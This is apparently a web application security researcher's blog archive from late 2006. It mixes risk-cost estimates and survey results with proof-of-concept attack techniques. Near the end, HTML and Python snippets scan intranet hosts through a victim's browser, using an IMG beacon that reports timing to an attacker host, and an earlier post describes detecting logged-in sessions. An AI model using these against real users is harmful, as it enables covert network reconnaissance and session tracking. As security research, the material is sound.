Thursday, December 28, 2006
"Once flaws have been identified, what is my motivation to fix them? If you can't give me the likelihood of attack, and what I stand to lose by it being exploited, how many dollars should I invest to repairing it?"
As security practitioners, we continue to say how much development organizations need to learn to build secure software. I'd say there's another side to that coin - security practitioners need to be able to measure the impact of particular threats in terms of dollars, so that we don't just reveal vulnerabilities and the threats that might exploit them, but what the business stands to lose if the vulnerability isn't fixed.
Very well stated, and it got me thinking about how this could be done. For some reason the movie Fight Club popped into my head, with the scene about how Jack, as an automotive manufacturer recall coordinator, applied "the formula". Seemed like a fun way to go about it. :)
I'm a recall coordinator. My job is to apply the formula.
Take the number of vehicles in the field, (A), and multiply it by the probable rate of failure, (B), then multiply the result by the average out-of-court settlement, (C). A times B times C equals X...
If X is less than the cost of a recall, we don't do one.
Are there a lot of these kinds of accidents?
Oh, you wouldn't believe.
... Which... car company do you work for?
A major one.
I know, I know, I broke the first rule of Fight Club. Anyway, I have no idea how "real" this formula is or if it's applied, but it seemed to make sense. I wondered if something similar could be applied to web application security. If nothing else, it's an entertaining exercise.
Take the number of known vulnerabilities in a website, (A), and multiply it by the probability of malicious exploitation, (B), then multiply the result by the average financial cost of handling a security incident, (C). A times B times C equals X...
If X is less than the cost of fixing the vulnerabilities, we won't.
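For fun, the webappsec version of the formula is easy to sketch in code. All the numbers below are made-up illustrations (12 vulnerabilities, a 25% exploitation probability, a $50,000 incident cost), since estimating B and C accurately is exactly the hard part.

```javascript
// Hypothetical sketch of "the formula" applied to webappsec.
// All inputs are illustrative guesses, not measured data.
function expectedLoss(vulns, exploitProbability, incidentCost) {
  return vulns * exploitProbability * incidentCost; // A * B * C = X
}

function shouldFix(vulns, exploitProbability, incidentCost, fixCost) {
  // If X is less than the cost of fixing, the formula says don't.
  return expectedLoss(vulns, exploitProbability, incidentCost) >= fixCost;
}

// Example: 12 known vulns, 25% chance of exploitation, $50,000 per incident.
const x = expectedLoss(12, 0.25, 50000);
console.log(x);                                  // → 150000
console.log(shouldFix(12, 0.25, 50000, 200000)); // → false (fix costs more than X)
console.log(shouldFix(12, 0.25, 50000, 100000)); // → true
```

Plugging in different guesses for B and C swings the answer wildly, which is really the point: without decent data, the formula just formalizes our uncertainty.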
Sounds like it could work, given you could be somewhat accurate in filling in the variables, which is the hard part. The thing is, this process probably isn't a suitable task for an information security person. Maybe we need to seek the assistance of an economist or a probability theorist and see what they have to say.
I think the reason behind the lack of consensus is a void of data and/or a means to measure success. We’re essentially flying blind. Let’s rhetorically consider several questions people commonly ask:
“How do I find out how many websites I have?”
“What do they do and how *important* are they?”
“Who’s responsible for them?”
Digging into a single website….
“How large and complex is the code base?”
“What’s the rate of application code change?”
Narrowing down to vulnerabilities…
“What vulnerabilities do I have?”
“Whose fault is it and how do I prioritize their remediation?”
“What do I do to protect myself in the meantime?”
Finally organizational changes…
“Which should I focus on, developer education or the use of a modern development framework?”
“Which testing process is better, white box or black box or glass box?”
Answering these questions is anything but simple, largely dependent on any number of factors, unknown to any single person, and varies from organization to organization. The point is an organization must be able to understand its current state of affairs. And we as an industry must be able to measure whether a particular strategy or solution is working and, if so, how well. This brings us to where I think we are today: best practices based upon conventional wisdom held over from other areas of information security, which do not apply here. A harsh reality.
To begin looking at things from a fresh perspective, I find it’s helpful to line up the "knowns" and "unknowns" for a particular problem set. From there it’s easier to spot trends, relationships, inconsistencies, and areas that should yield immediate return from investigation.
- Among what would normally be considered the largest, most popular, and most “secure” websites, the vast majority are found to have serious vulnerabilities. We have no idea about the security of the mid- and lower-end websites, which are typically not assessed.
- Those typically in charge of information security do not have the same level of control over the safety of their websites as they do at the network infrastructure level. Consequently, the responsibility of website security is unassigned or rests among several constituencies.
- Attacks targeting the web application layer are growing year over year in number, sophistication, and maliciousness. Real-world visibility into these attacks is extremely limited.
- Firewalls, patching, configuration, transmission/database encryption, and strong authentication solutions do not protect against the majority of web applications vulnerabilities.
- All software has defects and in turn will have vulnerabilities. Security enhancements provided by modern development frameworks help to prevent vulnerabilities, though will not eliminate them altogether. Measured benefit is unknown.
- Commerce web applications change relatively rapidly, with frequent incremental revisions. Traditional PC or enterprise software tends to be slower, shipping larger versioned builds. Web applications therefore tend to have a steady and faster flow of vulnerabilities.
- Developer education in software security and implementing security testing inside the quality assurance phase reduces the number of vulnerabilities, but will not eliminate them. See #5. The overall expected reduction of vulnerabilities as a result is unknown.
- It’s impossible to find all vulnerabilities through automation, so thorough security testing requires a significant amount of experienced human time. How much time is required and how close the process will come to finding everything is debatable.
- Web application security is a new and complex subject for which there is a limited population of experienced practitioners relative to the amount of workload.
- Web browser security is largely and fundamentally broken, leaving browsers unable to protect users against modern attacks. The situation hasn’t significantly improved with Firefox 2.0 or Internet Explorer 7.0, and it’s unclear if future releases will attempt to address the problem.
- Solutions must come from areas other than "fixing" the code
- We need to invest resources into measuring ROI from various solutions and best-practices
- Create training and perhaps certification programs for web application security professionals
- We need wider visibility into the real-world hacks
- We need to develop and implement new and innovated security designs for modern web browsers
Tuesday, December 26, 2006
Where are we now?
- 105 million sites are on the Web with 4 million new ones each month.
- Perhaps hundreds (?) of thousands of websites collect or distribute personal information, financial and healthcare data, credit card numbers, intellectual property, trade secrets, etc.
- Web application issues top every major Top-X vulnerability list.
- 8 out of 10 websites are full of holes and most of the attacks are targeting the web application layer.
- Assessments should be performed after each code change or "major" release and require about a week or two of human-time to complete.
Analyzing the scope using some assumptions:
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 40 assessments per year with base salary of $100,000 (US).
- Retail cost per assessment $5,000 (US). (Normally higher ranging between $8,000 - $15,000)
Today we'd need:
- 1 million total vulnerability assessments
- 25,000 experienced experts in web application VA
- $2,500,000,000 (US) in salary for web application experts
- $5,000,000,000 (US) retail assessment cost
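The arithmetic behind these numbers is simple multiplication, and a quick sketch makes it easy to re-run with different efficiency guesses. The inputs here are just the stated assumptions above, not measured data.

```javascript
// Back-of-the-envelope math for the web application VA market,
// using the assumptions stated above (illustrative, not measured).
function assessmentScale(sites, assessmentsPerYear, perExpertPerYear,
                         salary, retailPerAssessment) {
  const totalAssessments = sites * assessmentsPerYear;
  const expertsNeeded = totalAssessments / perExpertPerYear;
  return {
    totalAssessments,
    expertsNeeded,
    totalSalary: expertsNeeded * salary,
    totalRetail: totalAssessments * retailPerAssessment,
  };
}

// Today: 500,000 sites, 2 assessments/yr, 40 per expert, $100k salary, $5k retail.
const today = assessmentScale(500000, 2, 40, 100000, 5000);
console.log(today.totalAssessments); // → 1000000
console.log(today.expertsNeeded);    // → 25000
console.log(today.totalSalary);      // → 2500000000 ($2.5B)
console.log(today.totalRetail);      // → 5000000000 ($5B)
```

Swapping in more optimistic per-expert throughput and pricing shows just how sensitive the totals are to assessment efficiency, which is the whole argument for scale.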
Of course as the awareness of web application security builds the numbers will climb, but for now we have to face facts. And the fact is unless we can vastly improve the web application VA process, most websites will not be assessed for security and remain insecure. That’s what’s going on today. And that’s why I’m saying the future of web application vulnerability assessment is about scale.
While we certainly can’t reduce the number of “important” websites, we can reduce the number of man-hours and the expertise required to perform an assessment using technology and modern processes. Modern assessment processes need to be highly streamlined, repeatable, able to run thousands concurrently, and performable by less than top-tier webappsec experts. This is what it truly means to “scale”.
How much improvement can be made near term is a subject of much debate, but we’re working on it. For fun, let’s try a few more guesses at how certain efficiencies would help.
- 500,000 “important” websites (roughly 1/2 of 1% of the total population)
- Assessments 2-times a year per website. (Vary on change rate)
- An expert can perform 200 assessments per year with base salary of $80,000 (US).
- Retail cost per assessment $2,000 (US).
Then we'd need:
- 1 million total vulnerability assessments
- 5,000 experienced experts in web application VA
- $400,000,000 (US) in salary for web application experts
- $2,000,000,000 (US) retail assessment cost
Friday, December 22, 2006
Secure Code Through Frameworks
105 million sites make their home on the Web, and 4 million more move in each month. That’s a staggering number to think about, and as we well know, the vast majority of websites (I say 8 in 10) have serious security issues. Industry discussions go round and round about what should be done. We talk about secure coding practices, training, compliance, assessment, source-code audits, and the like. What’s going to work? Then I read something Robert Auger posted, arguing that the lack of security-enabled frameworks is why we’re vulnerable, touching on an area I’ve thought a lot about recently.
Friday, December 15, 2006
Attacks always get better, never worse. That’s probably what I’ll remember most about 2006. What a year it’s been in web hacking! There’s never been such a big leap forward in the industry and frankly it’s really hard to keep up. My favorite quote came today from Kryan:
To look back on what’s been discovered RSnake, Robert Auger, and myself collected as many of the new 2006 web hacks as we could find. We’re using the term "hacks" loosely to describe some of the more creative, useful, and interesting techniques/discoveries/compromises. There were about 60 to choose from making the selection process REALLY difficult. After much email deliberation we believe we created a solid Top 10. Below you’ll find the entire list in no particular order. Enjoy!
- Internet Explorer 7 "mhtml:" Redirection Information Disclosure
- Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
- Web Browser History Stealing - (with CSS, evil marketing, JS login-detection, and authenticated images)
- Backdooring Media Files (QuickTime, Flash, PDF, Images, Word , and MP3's)
- Forging HTTP request headers with Flash
- Exponential XSS
- Encoding Filter Bypass (UTF-7, Variable Width, US-ASCII)
- Web Worms - (AdultSpace, MySpace, Xanga)
- Hacking RSS Feeds
- Stealing User Information Via Automatic Form Filling
- Advanced Web Attack Techniques using GMail (Overwriting the Array constructor)
- Google Vulnerable Code Dork
The Attack of the TINY URLs
Backdooring MP3 Files
Backdooring QuickTime Movies
CSS history hacking with evil marketing
I know where you've been
Hacking RSS Feeds
MX Injection : Capturing and Exploiting Hidden Mail Servers
Blind web server fingerprinting
CSRF with MS Word
Backdooring PDF Files
Exponential XSS Attacks
Malformed URL in Image Tag Fingerprints Internet Explorer
Bypassing Mozilla Port Blocking
How to defeat digg.com
A story that diggs itself
Expect Header Injection Via Flash
Forging HTTP request headers with Flash
Cross Domain Leakage With Image Size
Enumerating Through User Accounts
Widespread XSS for Google Search Appliance
Detecting States of Authentication With Protected Images
XSS Fragmentation Attacks
Poking new holes with Flash Crossdomain Policy Files
Google Indexes XSS
XML Intranet Port Scanning
IMAP Vulnerable to XSS
Detecting Privoxy Users and Circumventing It
Using CSS to De-Anonymize
Response Splitting Filter Evasion
CSS History Stealing Acts As Cookie
Detecting Firefox Extensions
Stealing User Information Via Automatic Form Filling
Circumventing DNS Pinning for XSS
Netflix.com XSRF vuln
Widespread XSS for Google Search Appliance
Bypassing Filters With Encoding
Variable Width Encoding
AT&T Hack Highlights Web Site Vulnerabilities
How to get linked from Slashdot
F5 and Acunetix XSS disclosure
Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
Google plugs phishing hole
Nikon magazine hit with security breach
Metaverse breached: Second Life customer database hacked
HostGator: cPanel Security Hole Exploited in Mass Hack
I know what you've got (Firefox Extensions)
ABC News (AU) XSS linking the reporter to Al Qaeda
Account Hijackings Force LiveJournal Changes
Xanga Hit By Script Worm
Advanced Web Attack Techniques using GMail
PayPal Security Flaw allows Identity Theft
Internet Explorer 7 "mhtml:" Redirection Information Disclosure
Bypassing of web filters by using ASCII
Selecting Encoding Methods For XSS Filter Evasion
Adultspace XSS Worm
Anonymizing RFI Attacks Through Google
Google Hacks On Your Behalf
Google Dorks Strike Again
Thursday, December 14, 2006
The CSS History hack is a well-known brute-force way to uncover where a victim user has traveled. Great Firefox extensions like SafeHistory are helping protect against this simple hack, but the cat and mouse game continues. Despite this tool, I’ve found a new way to tell where the user has been AND also if they are “logged-in”. People are frequently and persistently logged-in to popular websites. Knowing which ones can be extremely helpful in improving the success rate of CSRF or Exponential XSS attacks, as well as other nefarious information-gathering activities.
Using Gmail as an example, <* script src=” http://mail.google.com/mail/”>
If you are logged-in…
If you are NOT logged-in…
I mapped the error messages from a few popular websites and made some PoC code.
Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. I don’t want to hear it about IE and Opera. :)
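The core of the trick, as I understand it, is that including a protected page as a script makes the JavaScript parser choke on the returned HTML, and because the logged-in and logged-out pages differ, so do the resulting parse-error line numbers that window.onerror can observe. A rough sketch of the detection logic (the site name and signature line numbers below are invented for illustration, not real measurements):

```javascript
// Hypothetical signature table: script-error line numbers observed for a
// site in each state. These values are made up for illustration only.
const signatures = {
  "example-webmail": { loggedIn: 4, loggedOut: 1 },
};

// Classify a captured script-error line number against a site's signature.
function classify(site, errorLine) {
  const sig = signatures[site];
  if (!sig) return "unknown";
  if (errorLine === sig.loggedIn) return "logged-in";
  if (errorLine === sig.loggedOut) return "logged-out";
  return "unknown";
}

// In a browser, the wiring would look roughly like this (not runnable here):
//   window.onerror = function (msg, url, line) {
//     report(classify("example-webmail", line));
//     return true; // suppress the error dialog
//   };
//   var s = document.createElement("script");
//   s.src = "https://webmail.example/inbox"; // hypothetical protected URL
//   document.body.appendChild(s);

console.log(classify("example-webmail", 4)); // → logged-in
```

The fragile part is the signature table: any redesign of the target page shifts the error lines, so an attacker would have to re-map them periodically.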
Wednesday, December 13, 2006
Research in 2006
Right on the money. Of course this might have been a self-fulfilling prophecy. :) Those are the best kind.
Commercial landscape in 2006
Personally I think compliance, specifically PCI, is going to be a big driver to improve web application security.
Blech, way off. PCI is a good standard with decent web application security components, but the enforcement of validation of compliance leaves something to be desired. When network scanning vendors can meet the minimum webappsec criteria with only the most rudimentary checks, then clearly there is improvement required. Checkbox != security. Maybe PCI will be a real driver by 2008. Time will tell.
To meet the requirements, I expect vendors will combine various types of vulnerability assessment products through innovation or acquisition. Current product/service offerings separate network, cgi, and web application assessment layers. Some combine 2, but not all three.
Off yet again. I still think this will happen, I just don't know exactly when. I thought it would have taken place already.
To pass PCI quickly, we'll see people looking for simple solutions or hacks to clean up their vulnerabilities. Not everyone has the resources available to fix their web app code the right way. As a result, I expect new web server add-ons (or WAFs) and configuration set-ups will be employed as band-aids to prevent the identification of vulnerabilities. This will create an interesting challenge for the industry.
Let's call this a 50/50. I was correct about a huge increase in web application firewall deployments in the market, led by ModSecurity and other commercial players. There are way more WAFs on the Web than there were in 2004 and 2005. However, this didn't have anything to do with meeting PCI or a band-aid approach as I guessed. Most deployments I've seen have been geared towards defense-in-depth, bravo, but I was wrong in the prediction. :)
Then a few other predictions:
* a variety of different product/service standards
* certifications for web application security professionals
* other industries begin implementing PCI-like security standards
Sheesh, way off.
I'm no Nostradamus, that's for sure.
Friday, December 08, 2006
"A few years back, Yahoo Games instituted an online chess ladder. A ladder system essentially ranks all the players from top to bottom, and you move up by beating people ranked higher on the ladder. Losing (or not playing) slowly lowers your ranking.
I'm a decent player—I won the state championship of Kentucky in my salad days—but couldn't begin to approach the top of Yahoo's ladder. But guess what? The people at the top weren't playing chess at all!
They were cheaters, a closed circle of players passing the crown around by systematically losing one-move games to each other. Player No. 2 challenges Player No. 1, makes one move to start the game, and then Player No. 1 resigns the game and they switch rankings on the ladder. "
There are literally thousands of people (or more) with an amazing amount of free time to do the most mundane tasks for the most inane rewards. “Cheating” players would code purpose-built programs to bot 100’s of chess games simultaneously, 24x7. They’d sit up late into the evening because every so often the ladder ranks would be reset, and when they were, they’d snatch the top spots. And once they owned a block of the top spots they’d only play within their controlled accounts to rise slowly in the ranks. The way the ladder logic worked, “legit” ranked players had to play against other equally or higher ranked players, and since cheaters wouldn’t play against them, legit players would drop in rank.
All that just to be at the top of the Yahoo Chess games ladder. No monetary reward, no praise, no nothing. Makes you think where else this is going on doesn’t it?
Thursday, December 07, 2006
Wednesday, December 06, 2006
"The scary unknown is intranet Website vulnerability, however, which the survey did not address. "There are no good metrics for how many intranet Websites there are, or how vulnerable they are. That's a big unknown in the industry," Grossman says. "It's a whole other world inside the firewall."
Update: Once again a great survey turnout. A total of 63 respondents. Thank you to everyone who responded and to those who helped me out with the questions. We didn't reach my prediction of 100, but that's OK because I'm not very good at those anyway. :) We'll try to get there in January. The problem is it's getting difficult to manage this by email; I'll have to figure out some way to remedy that. The data collected certainly did not disappoint and some interesting things bubbled to the top.
Good representation from both security vendors and enterprise professionals. Most respondents have several years of experience, dedicate a significant percentage of their time to web application security, and performed 1 - 40 assessments in 2006. An experienced bunch, I’d say.
About half of organizations that have vulnerability assessments performed see security measurement as the primary driver, and about a quarter say compliance. I would have figured measurement would have scored higher and compliance lower. Maybe we’re seeing a shift in the industry.
The vast majority of webappsec professionals believe assessments should be performed after each code change or "major" release, take a week or two to complete, and rarely encounter multi-factor authentication or web application firewalls. About half of the people using commercial scanners say scanners complete about half or less of their workload. The other half, who don’t use them, say assessments are faster to do by hand, have too many false positives, or are too expensive. There is much more to talk about here, but that’ll come in another post.
Question 12a on disclosure yielded some interesting results. People are evenly split between “responsible” disclosure and non-disclosure. Think about that. Just as many are disclosing as those who don’t because there is inherent risk. As I’ve said before, discovery is going to be a big issue moving forward. We’re going to lose the check and balance we’ve relied upon with traditional commercial and open source software.
It's been a month already since the last survey. In November we got a great turnout, doubling the response from October. Maybe this time we'll reach 100 respondents. Anyway...
If you perform web application vulnerability assessments, whether personally or professionally, this survey is for you. 15 multiple choice questions designed to help us understand more about the industry in which we work. Most of us in InfoSec dislike taking surveys, however the more people who respond the more informative the data will be. So far the information collected has been really popular and insightful. And a lot of people helped out with the formation of these questions.
- Open to those who perform web application vulnerability assessments/pen-tests
- Email your answers to jeremiah __at__ whitehatsec.com
- To curb fake submissions please use your real name, preferably from your employers domain.
- Submissions must be received by December 14.
Privacy: Absolutely no names or contact information will be released to anyone. Though feel free to self publish your answers (blogs).
1) What type of organization do you work for?
a) Security vendor / consultant (63%)
b) Enterprise (23%)
e) Other (please specify) (10%)
c) Government (5%)
d) Educational institution (0%)
2) What portion of your job is dedicated to web application security (as opposed to development, general security, incident response, etc)?
a) All or almost all (53%)
b) About half (28%)
c) Some (20%)
d) None (0%)
3) How many years have you been working in the web application security field?
c) 2 - 4 (33%)
e) 6+ (25%)
d) 4 - 6 (20%)
b) 1 - 2 (13%)
a) Less than a year (10%)
4) In your experience, what's the primary reason why organizations have web application vulnerability assessments performed?
a) To measure how secure they are, or not (53%)
b) Industry regulation and/or compliance (25%)
c) Customers or partners ask for independent third-party validation (10%)
e) Other (please specify) (10%)
d) No idea (3%)
5) How often should web applications be assessed for vulnerabilities?
a) After every code change (65%)
e) Other (please specify) (20%) - Answers mostly revolved around "major" releases.
c) Quarterly (10%)
b) Annually (5%)
d) Before the auditors arrive (0%)
6) How many web application vulnerability assessments have you personally conducted this year (2006)?
b) 1 - 20 (50%)
c) 20 - 40 (23%)
d) 40 - 60 (13%)
e) 60+ (10%)
a) None (5%)
7) How many man-hours does it take you to complete a web application vulnerability assessment on the average website?
c) 20 - 40 (50%)
b) 0 - 20 (23%)
d) 60 - 80 (23%)
e) 80+ (5%)
a) None (0%)
Please ONLY answer ONE of the two following questions (#8 and #9)
Commercial Vulnerability Scanners: (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
8) If commercial vulnerability scanners ARE part of your tool chest, how much of your preferred assessment methodology do they complete? 36 respondents (57%)
c) About half (58%)
d) A little bit (33%)
e) Not much (4%)
b) Most of it (4%)
a) All or almost all (0%)
9) If commercial vulnerability scanners are NOT part of your tool chest, why not? 27 respondents (43%)
d) Some combination of a, b, and c (61%)
a) Too many false positives (11%)
c) Faster to do assessments by hand (11%)
b) Too expensive (6%)
e) Haven't tried any of them (6%)
f) Other (please specify) (6%)
10) How often do you encounter web application firewalls blocking your attacks during a vulnerability assessment?
d) Never, or almost never (73%)
c) Sometimes (10%)
e) Hard to tell (10%)
b) About half of the time (5%)
a) A lot (3%)
11) While performing web application vulnerability assessment, how often do you encounter websites requiring multi-factor authentication?
(Hardware token, software token, secret questions, one-time passwords, etc.)
d) Never, or almost never (50%)
c) Sometimes (35%)
b) About half of the time (8%)
a) A lot (5%)
e) Hard to tell (3%)
12a) If you find a vulnerability in a website you don't have written permission to test, what do you do with the data MOST of the time?
b) Inform the website administrators (responsible disclosure) (36%)
c) Keep it to yourself, no sense risking jail or lawsuits (36%)
e) Other (please specify) (18%)
a) Post it sla.ckers.org (full-disclosure) (8%)
d) Sell it (3%)
Daniel Cuthbert: "WALK AWAY! spending 1 year fighting the british government over this exact thing made me realise this lone cowboy approach will never work :0)"
12b) How has the security of the average website changed this year (2006) vs. last year (2005)?
c) Same (50%)
b) Slightly more secure (28%)
d) Worse (20%)
a) Way more secure (3%)
e) No idea (0%)
13) What do you think of RSnake's XSS cheat sheet?
b) I like it (55%)
a) It rocks! (28%)
c) It has the basics, but there are more options (13%)
e) Never heard of it (5%)
d) Lame (0%)
c) No (38%)
b) Sometimes (33%)
a) Yes (18%)
d) Only when clicking on links from Jeremiah (10%)
15) What operating system are you using to answer this question?
a) Windows (68%)
b) OS X (15%)
c) Linux (15%)
d) BSD (3%)
e) Other (please specify) (0%)
16) The most valuable web application security tip/trick/idea/concept/hack/etc you learned this year (2006)? List just 1 thing. *Full list will be published*
When forms convert lower case to uppercase, use VBScript to test for XSS
When spidering a website use your standard USER AGENT, then crawl it again
The research and disclosure being done on sla.ckers.org and gnucitizen.org.
I don't remember.
combination of XSS and XHR. (My next PoC will show you why)
Blind SQL injection in MSSQL and MySQL, complex XSS injection (using the
I can tell you, but then I will have to sign you on an NDA :-)
mhtml: vulnerability - complete read access to the Internet on Internet
This might not be web app. related until after Vista is released (yeah, right).
I found interesting the concept of how to discover whether Visual Studio binaries have been /GS compiled; Used to mitigate local stack variable overflows.
Sorry, I'm restricted from saying. :/ I guess my best/most valuable tip that I use every time is don't become dependent on any one tip/trick/idea/concept/hack. :)
What cross domain restrictions? The web security model was completely smashed up this year and I don't pretend to claim to be smart enough to fix it. But what we got isn't working the way we thought it did.
I've found some new tools to try out, such as TamperIE, which I picked up from the "Hacking Web Applications Exposed 2nd Edition" book I purchased, and I believe you wrote the foreword. Plus I have to hand it to RSnake, id, maluc and the other people on sla.ckers.org, they just keep coming up with new attack vectors. Their disclosures can be a little frightening. As you said in the foreword, sometimes we just want to bury our head in the sand because we know most of the sites out there have vulnerabilities.
CSRF (Just after I tested a bloody forum too!)
improving my XSS knowledge with the awesome help of ha.ckers.org and sla.ckers.org
Learning more about web services, SOAP, XML, etc.
That demonstrating issues to a vendor/customer is much less effective than expressing the business liability and risk in $s :-)
Fully understanding AJAX, which is important, even if all I learned was that it wasn't as big a deal as I expected it to be (from a security standpoint it is a much bigger deal from developer and user viewpoints).
There is nothing new under the sun. People still do dumb things.
XSS + Ajax avoids the same-domain security sandbox.
Bypassing filtering mechanisms by UTF-16 encoding URLs even when there's no need to
Using POST content as a query string in most cases won't affect the way the receiving application reacts. Attacks are more portable and easier to demonstrate in link format.
Implications of Flash 9 crossdomain.xml, including flaws in the implementation and severe lack of best practice standards. The floodgates may be open on client-side code with cross-domain privileges (Quicktime, etc.), but it's good to see a misstep at least happening in the right direction.
This is my statement for the web application security year 2006:
Everyone can find a XSS vulnerability but fortunately only a few people can imagine what this really means.
Automating viewstate injection. Maybe I'll release some notes about it.
Nothing can replace experience!
Watch out for that stupid UTF-7 encoding.
Search myspace for answers to secret questions :)
Intranet IP scanning really opened up my thinking of what XSS could be used to accomplish.
Sunday, December 03, 2006
Thursday, November 30, 2006
"The hype surrounding AJAX and security risks is hard to miss. Supposedly, this hot new technology responsible for compelling web-based applications like Gmail and Google Maps harbors a dark secret that opens the door to malicious hackers. Not exactly true. Even the most experienced Web application developers and security experts have a difficult time cutting through the buzzword banter to find the facts. And, the fact is most websites are insecure, but AJAX is not the culprit. Although AJAX does not make websites any less secure, it’s important to understand what does." read more...
Wednesday, November 29, 2006
He’s right of course. In the past 18 months it seems everything web browser related has been hacked. The same-origin policy, cookie security policy, history protection, the intranet boundary, extension models, flash security, location bar trust, and other sensitive areas have all been exposed. Web security models are completely broken and heck it’s spooky to even click on links these days. If we didn’t/don’t rely on client-side (browser) security, none of these discoveries would have mattered and none of us would have cared. But we do! Why is that?
You see, when a user logs in to a website, the first thing they must have is a reasonable assurance that the web page they're visiting is from whom it claims to be. It could easily be a phishing site. Without a visually trustable location bar, SSL/TLS lock symbol, or HTML hyperlink display, the user could be tricked into handing over their username/password to an attacker. Which of course could in turn be used to illegally access our websites. Website security depends on the user not being *easily* tricked, but this does happen hundreds or maybe thousands of times a day.
This moves us to transport security. We don’t want sensitive data compromised by an attacker sniffing the web-browser-web server connection. If for some reason the browser has a faulty implementation of SSL/TLS (it happens) the crypto can be cracked and any sensitive data our website collects could fall into the wrong hands. Our website may remain safe and sound, but the data isn’t and that’s really the whole idea. Websites are relying on the browser to have a solid SSL/TLS implementation otherwise back to plaintext we go.
So maybe we are already trusting client-side (web browser) security. And with the web security models being set-up the way they are, we probably have to keep doing so for years to come.
Update: Kelly Jackson Higgins, from Dark Reading, posted some quality coverage in Where the Bugs Are.
It’s been a busy morning. I presented two popular webinars on "First Look at New Web Application Security Statistics - The Top 10 Web Application Vulnerabilities and their Impact on the Enterprise" [slides]. We've been offering the WhiteHat Sentinel Service for several years and in that time we've performed thousands of assessments on real-world websites. As a result we’ve collected a huge database of custom web application vulnerabilities, which to the best of my knowledge is the largest anywhere. Starting January 2007 we’ll be releasing a Web Application Security Report containing statistics derived from that data. Instead of waiting the two months, we figured we’d release some statistics early as a taste of things to come:
"Web applications are now the top target for malicious attacks. Why? Firstly, 8 out of 10 websites have serious vulnerabilities making them easy targets for criminals seeking to cash in on cyber crime. Secondly, enterprises that want to reduce the risk of financial losses, brand damage, theft of intellectual property, legal liability, among others, are often unaware that these web application vulnerabilities exist, their possible business impact, and how they are best prevented. Currently, this lack of knowledge limits visibility into an enterprise’s actual security posture. In an effort to deliver actionable information, and raise awareness of actual web application threats, WhiteHat Security is introducing the Web Application Security Risk Report, published quarterly beginning in January 2007."
Webinar slides and the full report [registration required] are available for download.
We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!
The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)
How bad is it out there? 8 out of 10 websites are vulnerable, but how severe are the vulnerabilities?
The likelihood of a website having a high or medium severity vulnerability, by class.
<* meta http-equiv="refresh" content="5;url=http://foo/">
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
What I found was that while the LINK HTTP request is waiting, META refreshes won’t fire until it resolves. Weird. Again, I don’t know how this is useful yet, but it could be for something in the future.
Use a SCRIPT tag to SRC in any invalid file type, like an image.
<* script src="1.jpg"><* /script>
To suppress the error message, use a type attribute with any value:
<* script src="1.jpg" type="put_anything_here"><* /script>
How is this useful? I don't know, but it's weird, eh?
More to come.
Tuesday, November 28, 2006
Update: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.
The HTML is hosted on an attacker-controlled website.
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<* img src="http://attacker/check_time.pl?ip=192.168.1.100&start=epoch_timer" />
The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is to act as a timer and data-transport mechanism back to the attacker. Once the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (set when the web page was dynamically generated) it’s possible to tell if the host is up. If the time difference is less than, say, 5 seconds, then the host is likely up; if more, then the host is probably down (the browser waited for a timeout). Simple.
Example (attacker web server logs)
Current epoch: 1164762279
(3 second delay) - Host is up
Current epoch: 1164762286
(10 second delay) - Host is down
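For anyone who wants to experiment, check_time.pl was a Perl CGI I haven't published; here's a hypothetical Python sketch of just the up/down decision it would make. The 5-second threshold and the epoch values mirror the description and logs above; the function name and structure are my own assumptions.

```python
import time

UP_THRESHOLD_SECONDS = 5  # a delay under this suggests the target host answered

def classify_host(epoch_timer, now=None):
    """Compare the page-generation epoch (embedded in the IMG URL's
    'start' parameter) against the time the check_time request arrived.

    "up"   -> the LINK tag's request to the target resolved quickly
    "down" -> the browser sat waiting until its connection timeout expired
    """
    if now is None:
        now = int(time.time())
    delay = now - int(epoch_timer)
    return "up" if delay < UP_THRESHOLD_SECONDS else "down"

# Mirroring the log excerpts above (page generated at epoch 1164762276):
print(classify_host(1164762276, now=1164762279))  # 3 second delay -> up
print(classify_host(1164762276, now=1164762286))  # 10 second delay -> down
```

The threshold is a guess that trades accuracy for speed: a slow-but-alive host past 5 seconds will be misreported as down, which is one of the accuracy headaches mentioned below.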
A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAME connections, which seemed to work.
<* iframe src="/portscan.pl?ip=192.168.201.100" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.101" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.102" scrolling="no"><* /iframe>
I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.
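Since the IFRAMEs above are just one-per-target, the attacker page generating them is trivial. Here's a hypothetical Python sketch of that generator step; the `/portscan.pl` path and the 192.168.201.x range come from the example above, while the function name and everything else are assumptions.

```python
def iframe_sweep(prefix, start, end, path="/portscan.pl"):
    """Emit one IFRAME per target IP so the browser opens the
    timing probes in parallel rather than one at a time."""
    tags = []
    for host in range(start, end + 1):
        ip = f"{prefix}.{host}"
        tags.append(f'<iframe src="{path}?ip={ip}" scrolling="no"></iframe>')
    return "\n".join(tags)

# Reproduces the three IFRAMEs shown above:
print(iframe_sweep("192.168.201", 100, 102))
```

In practice you'd cap how many IFRAMEs are emitted at once, since browsers limit concurrent connections and too many parallel probes would skew the timing measurements.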
Monday, November 27, 2006
Wednesday, November 22, 2006
